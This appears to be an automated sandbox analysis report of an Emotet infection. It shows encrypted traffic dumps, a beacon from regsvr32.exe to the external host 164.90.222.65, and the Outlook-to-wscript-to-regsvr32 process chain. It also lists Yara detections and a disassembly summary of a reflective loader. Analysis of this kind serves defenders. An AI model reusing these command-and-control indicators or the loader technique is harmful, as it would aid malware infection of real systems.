                                                                                          Data Ascii: :h02J4zmaozS/BS(QzGC5p6!Qdk|S&TU(k}_}<Y('QBE3byb5zE70me90zGC5I,p6!Q]0gd5UTUs.ke3+qc3tq&WB4bkD3zS{c9?(bAdwx<T 'QBR!:qb5zb'BS()9+q|%rqx,n0!}CadS&.lU(kX
                                                                                          2023-03-20 08:06:41 UTC267INData Raw: c5 27 0c 2f 37 a1 49 c4 b6 26 65 03 7a 74 71 78 bd 2d 18 28 96 8d 6d ac b5 04 17 22 1e a4 40 46 5e 3e 77 66 71 be 00 77 68 aa 09 1d 7f 25 f0 16 65 03 62 65 7b 78 b7 1d 18 28 bb 65 75 06 dc 95 a2 9c 94 48 e8 61 db e7 53 26 01 bc 89 1f a3 a8 2d b2 e9 63 fa ad 0d ce 69 50 11 31 b7 02 2c 21 bb 4a 49 0b bf 3b 13 2b e0 e3 3e 2c ca 9a 9f ea 05 64 0c d0 c4 5b 2c b2 e7 c3 eb e5 be bc 7d ff 74 c3 a1 59 3c af 74 05 09 2f 97 48 33 a5 2f 24 3d a5 87 7a 53 6e c0 f7 31 05 ef 2f 41 61 62 78 71 62 f8 21 50 33 ea 39 85 d8 1c f6 b7 e0 35 66 6c 47 f2 0e 4f 58 62 a5 51 5e 0b 2a c4 43 60 0b 62 3c 67 64 f8 6f 55 42 7a 69 35 74 f0 3c 18 79 df c0 cf de d0 36 10 68 3b 9a 94 ff ea 20 11 5a d8 62 61 6f ac 64 b9 95 9a 71 b6 2e 21 ff 41 43 7d ff ba 30 bf 9d 0c 33 78 de b1 8e 7c c1 6f
                                                                                          Data Ascii: '/7I&eztqx-(m"@F^>wfqwh%ebe{x(euHaS&-ciP1,!JI;+>,d[,}tY<t/H3/$=zSn1/Aabxqb!P395flGOXbQ^*C`b<gdoUBzi5t<y6h; Zbaodq.!AC}03x|o
                                                                                          2023-03-20 08:06:41 UTC275INData Raw: 14 02 1e 4a 22 8f 77 46 43 ba 18 9b 60 bd 17 02 7d 15 0b cb 21 ac 21 1d 1f 03 33 62 41 82 51 50 51 73 bd 1d 18 48 9c dc 51 42 b5 3c 17 42 75 d6 7a 66 be 3e 77 06 cc 73 60 73 a3 27 41 11 b4 6f 55 52 72 8b 74 fd 79 bf 78 7d 1c f5 06 21 51 c3 78 6c 13 ec 4f 34 af e5 41 5e 73 0b 98 0a 8a d8 6c 4f 45 b0 7b 0f 51 e9 0d 67 0d ff 75 5c 0f 91 7d e1 78 25 96 06 10 68 7c d0 6b 00 e0 20 11 5a 8f 93 ba c8 c5 27 0c 4b fc ba 36 2b fa 26 65 63 bc 30 55 58 74 da f8 70 f3 ed 9d 8e 7c c1 6f 46 7b 55 37 33 74 2f 12 70 0d ba 28 77 e1 23 e4 d5 9f 2b 71 62 09 c8 44 6c b6 3d 5b c9 0d 68 30 e6 14 25 c7 68 33 62 ea 45 06 b2 69 85 ac 67 fd be cc db a0 23 ee c0 be 5e 16 20 e6 46 97 35 fa b8 85 58 3c 68 30 aa 04 25 c3 aa f2 88 6f 89 34 03 b4 0f 34 ad 83 e3 84 d2 5d 0c d8 09 ca e8 81
                                                                                          Data Ascii: J"wFC`}!!3bAQPQsHQB<Buzf>ws`s'AoURrtyx}!QxlO4A^slOE{Qgu\}x%h|k Z'K6+&ec0UXtp|oF{U73t/p(w#+qbDl=[h0%h3bEig#^ F5X<h0%o44]
                                                                                          2023-03-20 08:06:41 UTC283INData Raw: 28 ea 28 19 4b 37 00 ce 2a 06 15 17 f8 3d 1c d8 49 48 4e 4f bf ed f3 0d 2b a4 35 00 61 0f 70 62 42 af 00 2f fc b2 ab 64 5b b2 72 33 86 83 80 a9 36 fd 24 60 bd 2c 24 c6 07 23 51 85 71 60 04 f5 6b 00 0a 21 1d 25 da 63 6d b6 31 7b d9 a0 51 39 b4 6e 59 eb 05 67 0d ff 34 98 b5 1d 18 58 bb 64 41 06 bf 05 2b 26 e0 45 41 ef 60 9e da 62 61 1f 0c de 6d 83 dc 3f 3f 2b 71 2a c8 07 11 54 99 81 d3 a4 c3 20 b3 e5 31 1f f7 84 ff ae 27 8b bd 2d bc 21 5b 6f cc 5c 54 1a a1 18 7d 70 b6 50 51 23 17 0b b4 98 f1 78 3c 59 b7 ec 14 f9 51 42 34 00 b8 d6 4f e0 61 64 35 32 d8 8a 61 ff 44 53 28 2f ee 8d 1b 9b 71 62 41 84 71 50 29 7c 3c 59 3c 21 b9 52 99 cb 70 6c 7b e9 ef 24 b1 64 35 7a 1a ad 9d be 00 77 68 e0 e1 1d ff 2b 71 62 08 ca 5e c4 f8 3c 18 69 b7 ec 14 99 51 42 34 00 b8 98 e2
                                                                                          Data Ascii: ((K7*=IHNO+5apbB/d[r36$`,$#Qq`k!%cm1{Q9nYg4XdA+&EA`bam??+q*T 1'-![o\T}pPQ#x<YQB4Oad52aDS(/qbAqP)|<Y<!Rpl{$d5zwh+qb^<iQB4
                                                                                          2023-03-20 08:06:41 UTC290INData Raw: 10 52 30 c9 76 4a 60 2e 9e 9b be 37 7b ab 51 be 85 b1 2c e2 30 11 be 5e 59 a2 b0 81 ca b3 34 58 e9 d9 3c 68 f1 4c 71 44 b5 0d 13 a7 12 00 61 ef 78 5a a4 c7 6e fd fc ec 7e a4 6b e8 d6 28 bb a3 a8 46 bc 39 51 f9 71 79 d4 9b 84 2b d0 37 14 1d b4 d2 61 c7 24 54 07 47 53 26 ce 7a 74 a4 c9 40 af e8 d6 28 bb a3 a8 45 bc 39 41 f9 49 69 a2 46 33 21 96 07 2c 46 a6 62 6b c1 04 7c 36 fb 16 3e 5b 7e 44 53 a9 1e 7d d0 1c 27 71 e9 04 5b 71 ff 34 48 b7 0c 1c e3 7d 09 1d c9 ff c1 77 46 4b e8 39 76 cb 85 1b a5 81 0f 1f 0e eb ac 20 21 e2 1d 71 62 2a 06 2d 30 f8 3d 24 d8 79 70 c3 f6 ae bd b5 3d 2b 7e a4 0c 61 a3 70 5a 91 91 45 37 c5 1e 08 89 b2 c1 1a 40 34 42 54 ca 70 54 f0 0d 1c c7 d3 0b 2d aa 14 62 bf 0d 2b 8a a9 d4 9f 9b f2 3f 73 01 d4 37 44 d2 65 4b 55 d2 56 4c b0 0f 61
                                                                                          Data Ascii: R0vJ`.7{Q,0^Y4X<hLqDaxZn~k(F9Qqy+7a$TGS&zt@(E9AIiF3!,Fbk|6>[~DS}'q[q4H}wFK9v !qb*-0=$yp=+~apZE7@4BTpT-b+?s7DeKUVLa
                                                                                          2023-03-20 08:06:41 UTC298INData Raw: 7d 78 f8 6f 55 52 5f 74 35 74 f0 34 18 69 bc a2 90 0d e9 f7 b5 06 28 e3 2f 24 51 cd 2c 7a 53 ad 09 13 74 a4 c9 aa 8f 3a b6 7f 55 52 c0 37 11 44 81 b1 a5 59 b7 2c 14 11 d8 06 10 78 b8 2e 4f 38 ea 20 11 3a 60 ee 04 be 4c 94 6c 4f 55 09 4e 2b 71 e3 05 67 05 9c 9e 87 c3 d8 48 4c 00 62 ac 43 34 c3 77 46 5b 89 25 40 05 f1 1f 02 0d bc 40 77 1b a3 24 b0 77 2f b6 26 65 73 45 77 71 78 bd 1d 18 58 dc 74 ae bd b5 3c 17 52 6c c5 9f 9b be 3e 77 16 cc 73 60 63 60 e8 a1 11 fc e7 39 eb 1d 67 3d 21 27 2f 7d 0f 7d 3f 78 ac 3d 66 84 00 b2 8e 3b 01 61 64 7d f1 ce ae 45 37 44 1b a3 de ed 39 3f 2b 35 e9 f4 cb 35 74 71 4b fc 9e 78 4c 00 5b 2f 42 34 04 b8 9b e2 44 45 5c 8d 74 9c 26 45 f0 00 77 1c 96 6e 39 3f 18 8e 5f 1a 4f 35 74 7e fc 0f 5a 3c 68 0d b2 06 42 34 47 b7 c7 69 00 61
                                                                                          Data Ascii: }xoUR_t5t4i(/$Q,zSt:UR7DY,x.O8 :`LlOUN+qgHLbC4wF[%@@w$w/&esEwqxXt<Rl>ws`c`9g=!'/}}?x=f;ad}E7D9?+55tqKxL[/B4DE\t&Ewn9?_O5t~Z<hB4Gia
                                                                                          2023-03-20 08:06:41 UTC306INData Raw: 6e 2d 32 62 cf a5 63 64 69 1f 52 26 6f 51 45 53 98 ce 67 39 13 4d 70 62 24 29 34 74 cd dd 3e 59 54 02 31 21 8f 28 35 48 fb c7 69 00 81 0e 34 7a 3e 4a 44 37 94 f6 2a 6b 15 55 3e 2b 82 0d 40 43 dd d1 73 78 c8 36 3d 68 aa 51 50 42 e8 e9 31 62 f7 70 60 64 22 0f 52 26 b9 92 46 53 30 1e 64 39 9a 5d 70 62 e9 e2 37 74 d9 0e 3d 59 04 ef 31 21 41 e4 36 48 0b e5 6a 00 28 ec 34 7a 73 83 47 37 08 db 29 6b 4a b0 3e 2b 5d c2 43 43 05 fd 70 78 17 d3 3d 68 2c 81 53 42 18 c2 32 62 d3 8b 60 64 41 d8 51 26 fd bc 45 53 76 e6 64 39 97 8a 73 62 21 ce 34 74 79 f6 3d 59 10 ce 32 21 59 cc 35 48 03 ed 6a 00 31 c4 37 7a 63 a9 44 37 81 dc 29 6b 49 99 3d 2b b9 ed 40 43 17 e0 70 78 04 ff 3e 68 14 b5 50 42 37 dd 32 62 53 a3 63 64 31 ef 52 26 9d a2 45 53 ec cb 67 39 e7 be 70 62 93 d5 34
                                                                                          Data Ascii: n-2bcdiR&oQESg9Mpb$)4t>YT1!(5Hi4z>JD7*kU>+@Csx6=hQPB1bp`d"R&FS0d9]pb7t=Y1!A6Hj(4zsG7)kJ>+]CCpx=h,SB2b`dAQ&ESvd9sb!4ty=Y2!Y5Hj17zcD7)kI=+@Cpx>hPB72bScd1R&ESg9pb4
                                                                                          2023-03-20 08:06:41 UTC311INData Raw: 0d 0a
                                                                                          Data Ascii:
                                                                                          2023-03-20 08:06:41 UTC311INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          3192.168.2.349737164.90.222.65443C:\Windows\System32\regsvr32.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2023-03-20 08:08:11 UTC311OUTPOST /wfqhlvcfruxkwghn/ivirkxueekmcz/ HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Length: 0
                                                                                          Host: 164.90.222.65
                                                                                          2023-03-20 08:08:11 UTC311INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Mon, 20 Mar 2023 08:08:11 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          2023-03-20 08:08:11 UTC311INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:09:06:33
                                                                                          Start date:20/03/2023
                                                                                          Path:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail
                                                                                          Imagebase:0x7ff64d520000
                                                                                          File size:41778000 bytes
                                                                                          MD5 hash:CA3FDE8329DE07C95897DB0D828545CD
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate

                                                                                          General

                                                                                          Target ID:1
                                                                                          Start time:09:06:34
                                                                                          Start date:20/03/2023
                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf"
                                                                                          Imagebase:0x7ff7e91a0000
                                                                                          File size:165888 bytes
                                                                                          MD5 hash:563EDAE37876138FDFF47F3E7A9A78FD
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1414548751.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1411114207.000002D845CCE000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1413926742.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1410988197.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1411114207.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1412954439.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.1542433572.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1414114730.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          Reputation:moderate

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:09:06:41
                                                                                          Start date:20/03/2023
                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
                                                                                          Imagebase:0x7ff6d5170000
                                                                                          File size:24064 bytes
                                                                                          MD5 hash:578BAB56836A3FE455FFC7883041825B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.1501910088.0000000000460000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:09:06:44
                                                                                          Start date:20/03/2023
                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll"
                                                                                          Imagebase:0x7ff6d5170000
                                                                                          File size:24064 bytes
                                                                                          MD5 hash:578BAB56836A3FE455FFC7883041825B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:8.1%
                                                                                            Dynamic/Decrypted Code Coverage:25.8%
                                                                                            Signature Coverage:20.6%
                                                                                            Total number of Nodes:97
                                                                                            Total number of Limit Nodes:4
                                                                                            execution_graph 8532 180001184 8539 180002a30 8532->8539 8535 180001191 8548 180002d5c 8539->8548 8542 180006cf0 8573 180007f30 GetLastError 8542->8573 8544 18000119a 8544->8535 8545 180002a44 8544->8545 8634 180002cf0 8545->8634 8547 180002a4f 8547->8535 8549 18000118d 8548->8549 8550 180002d7b GetLastError 8548->8550 8549->8535 8549->8542 8560 18000479c 8550->8560 8564 1800045bc 8560->8564 8565 1800046d6 TlsGetValue 8564->8565 8571 180004600 __vcrt_FlsAlloc 8564->8571 8566 18000462e LoadLibraryExW 8568 1800046a5 8566->8568 8569 18000464f GetLastError 8566->8569 8567 1800046c5 GetProcAddress 8567->8565 8568->8567 8570 1800046bc FreeLibrary 8568->8570 8569->8571 8570->8567 8571->8565 8571->8566 8571->8567 8572 180004671 LoadLibraryExW 8571->8572 8572->8568 8572->8571 8574 180007f71 FlsSetValue 8573->8574 8579 180007f54 8573->8579 8575 180007f83 8574->8575 8576 180007f61 SetLastError 8574->8576 8590 180008714 8575->8590 8576->8544 8579->8574 8579->8576 8581 180007fb0 FlsSetValue 8584 180007fbc FlsSetValue 8581->8584 8585 180007fce 8581->8585 8582 180007fa0 FlsSetValue 8583 180007fa9 8582->8583 8597 18000878c 8583->8597 8584->8583 8603 180007b24 8585->8603 8595 180008725 __std_exception_copy 8590->8595 8591 180008776 8611 1800086f4 8591->8611 8592 18000875a RtlAllocateHeap 8593 180007f92 8592->8593 8592->8595 8593->8581 8593->8582 8595->8591 8595->8592 8608 18000abf8 8595->8608 8598 180008791 HeapFree 8597->8598 8602 1800087c0 8597->8602 8599 1800087ac GetLastError 8598->8599 8598->8602 8600 1800087b9 __free_lconv_mon 8599->8600 8601 1800086f4 __std_exception_copy 9 API calls 8600->8601 8601->8602 8602->8576 8620 1800079fc 8603->8620 8614 18000ac38 8608->8614 8612 180007f30 __std_exception_copy 11 API calls 8611->8612 8613 1800086fd 8612->8613 8613->8593 8619 180008160 EnterCriticalSection 8614->8619 8632 180008160 EnterCriticalSection 8620->8632 8635 180002d04 8634->8635 8639 180002d1e __vcrt_freefls 8634->8639 8636 18000479c __vcrt_freeptd 6 API calls 8635->8636 8638 180002d0e 8635->8638 8636->8638 8640 1800047e4 8638->8640 8639->8547 8641 1800045bc __vcrt_FlsAlloc 5 API calls 8640->8641 8642 180004812 8641->8642 8643 180004824 TlsSetValue 8642->8643 8644 18000481c 8642->8644 8643->8644 8644->8639 8645 450000 8649 45015a 8645->8649 8646 4508eb 8647 45033f GetNativeSystemInfo 8647->8646 8648 450377 VirtualAlloc 8647->8648 8650 450395 VirtualAlloc 8648->8650 8651 4503aa 8648->8651 8649->8646 8649->8647 8650->8651 8652 450873 8651->8652 8654 45084b VirtualProtect 8651->8654 8652->8646 8653 4508c6 RtlAddFunctionTable 8652->8653 8653->8646 8654->8651 8655 734214 8656 734256 8655->8656 8659 743988 8656->8659 8658 7344c6 8660 743a29 8659->8660 8661 743acc CreateProcessW 8660->8661 8661->8658 8662 180010a8e ExitProcess 8665 180014c90 LoadStringW LoadStringW 8662->8665 8674 1800109d0 LoadCursorW RegisterClassExW 8665->8674 8667 180014cec 8675 180010910 CreateWindowExW 8667->8675 8669 180014cfa 8670 180014d02 GetMessageW 8669->8670 8671 180010ab3 8669->8671 8670->8671 8672 180014d19 TranslateAcceleratorW 8670->8672 8672->8669 8673 180014d2f TranslateMessage DispatchMessageW 8672->8673 8673->8669 8674->8667 8676 1800109a1 ShowWindow UpdateWindow 8675->8676 8677 18001099d 8675->8677 8676->8677 8677->8669 8678 7380cc 8680 7380f3 8678->8680 8679 7382ba 8680->8679 8682 74e9e8 8680->8682 8685 738bc8 8682->8685 8684 74eab4 8684->8680 8687 738c02 8685->8687 8686 738eb8 8686->8684 8687->8686 8688 738d6f Process32FirstW 8687->8688 8688->8687

                                                                                            Executed Functions

                                                                                            Function 00450000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 450000-45029a call 45091c * 2 13 450905 0->13 14 4502a0-4502a4 0->14 15 450907-45091a 13->15 14->13 16 4502aa-4502ae 14->16 16->13 17 4502b4-4502b8 16->17 17->13 18 4502be-4502c5 17->18 18->13 19 4502cb-4502dc 18->19 19->13 20 4502e2-4502eb 19->20 20->13 21 4502f1-4502fc 20->21 21->13 22 450302-450312 21->22 23 450314-45031a 22->23 24 45033f-450371 GetNativeSystemInfo 22->24 25 45031c-450324 23->25 24->13 26 450377-450393 VirtualAlloc 24->26 27 450326-45032a 25->27 28 45032c-45032d 25->28 29 450395-4503a8 VirtualAlloc 26->29 30 4503aa-4503ae 26->30 33 45032f-45033d 27->33 28->33 29->30 31 4503b0-4503c2 30->31 32 4503dc-4503e3 30->32 34 4503d4-4503d8 31->34 35 4503e5-4503f9 32->35 36 4503fb-450417 32->36 33->24 33->25 37 4503c4-4503d1 34->37 38 4503da 34->38 35->35 35->36 39 450419-45041a 36->39 40 450458-450465 36->40 37->34 38->36 41 45041c-450422 39->41 42 450537-450542 40->42 43 45046b-450472 40->43 44 450424-450446 41->44 45 450448-450456 41->45 46 4506e6-4506ed 42->46 47 450548-450559 42->47 43->42 48 450478-450485 43->48 44->44 44->45 45->40 45->41 49 4506f3-450707 46->49 50 4507ac-4507c3 46->50 51 450562-450565 47->51 48->42 52 45048b-45048f 48->52 56 45070d 49->56 57 4507a9-4507aa 49->57 58 4507c9-4507cd 50->58 59 45087a-45088d 50->59 53 450567-450574 51->53 54 45055b-45055f 51->54 55 45051b-450525 52->55 60 45060d-450619 53->60 61 45057a-45057d 53->61 54->51 64 450494-4504a8 55->64 65 45052b-450531 55->65 62 450712-450736 56->62 57->50 63 4507d0-4507d3 58->63 80 4508b3-4508ba 59->80 81 45088f-45089a 59->81 72 4506e2-4506e3 60->72 73 45061f 60->73 61->60 68 450583-45059b 61->68 89 450796-45079f 62->89 90 450738-45073e 62->90 70 45085f-45086d 63->70 71 4507d9-4507e9 63->71 66 4504cf-4504d3 64->66 67 4504aa-4504cd 64->67 65->42 65->52 76 4504d5-4504e1 66->76 77 4504e3-4504e7 66->77 75 450518-450519 67->75 68->60 78 45059d-45059e 68->78 70->63 74 450873-450874 70->74 82 45080d-45080f 71->82 83 4507eb-4507ed 71->83 72->46 84 450625-450648 73->84 74->59 75->55 85 450511-450515 76->85 87 4504fe-450502 77->87 88 4504e9-4504fc 77->88 86 4505a0-450605 78->86 94 4508bc-4508c4 80->94 95 4508eb-450903 80->95 91 4508ab-4508b1 81->91 96 450811-450820 82->96 97 450822-45082b 82->97 92 4507ef-4507f9 83->92 93 4507fb-45080b 83->93 110 4506b2-4506b7 84->110 111 45064a-45064b 84->111 85->75 86->86 98 450607 86->98 87->75 105 450504-45050e 87->105 88->85 89->62 104 4507a5-4507a6 89->104 99 450740-450746 90->99 100 450748-450754 90->100 91->80 101 45089c-4508a8 91->101 106 45082e-45083d 92->106 93->106 94->95 103 4508c6-4508e9 RtlAddFunctionTable 94->103 95->15 96->106 97->106 98->60 107 45077b-45078d 99->107 108 450764-450776 100->108 109 450756-450757 100->109 101->91 103->95 104->57 105->85 112 45083f-450845 106->112 113 45084b-45085c VirtualProtect 106->113 107->89 125 45078f-450794 107->125 108->107 116 450759-450762 109->116 118 4506ce-4506d8 110->118 119 4506b9-4506bd 110->119 117 45064e-450651 111->117 112->113 113->70 116->108 116->116 122 450653-450659 117->122 123 45065b-450666 117->123 118->84 124 4506de-4506df 118->124 119->118 120 4506bf-4506c3 119->120 120->118 129 4506c5 120->129 126 45068d-4506a3 122->126 127 450676-450688 123->127 128 450668-450669 123->128 124->72 125->90 132 4506a5-4506aa 126->132 133 4506ac 126->133 127->126 130 45066b-450674 128->130 129->118 130->127 130->130 132->117 133->110
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1501882145.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_450000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                            • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                            • API String ID: 394283112-3605381585
                                                                                            • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                            • Instruction ID: a0d8ef5f41e444f4264570b3b04b3092f1b62f2b0325f5afb8800becf619d025
                                                                                            • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                            • Instruction Fuzzy Hash: 8E521634618B488BC719DF18D8857BAB7E0FB55305F14462EEC8BC7252DB38E546CB8A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074709C Relevance: 11.5, Strings: 9, Instructions: 237COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
                                                                                            • API String ID: 0-383957222
                                                                                            • Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                            • Instruction ID: e72b5e28e5770599b69a38d0d014e98f65006602cc2aaf73b84de83a25e9e2bc
                                                                                            • Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                            • Instruction Fuzzy Hash: 3AC1CD71519780AFD388CF28C58A91BBBF0FBD4748F906A1DF89686260D7B4D949CF02
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180010C10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78librarymemorynativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                            • String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
                                                                                            • API String ID: 2485490239-3005932707
                                                                                            • Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                            • Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
                                                                                            • Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                            • Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00737D6C Relevance: 7.7, Strings: 6, Instructions: 201COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
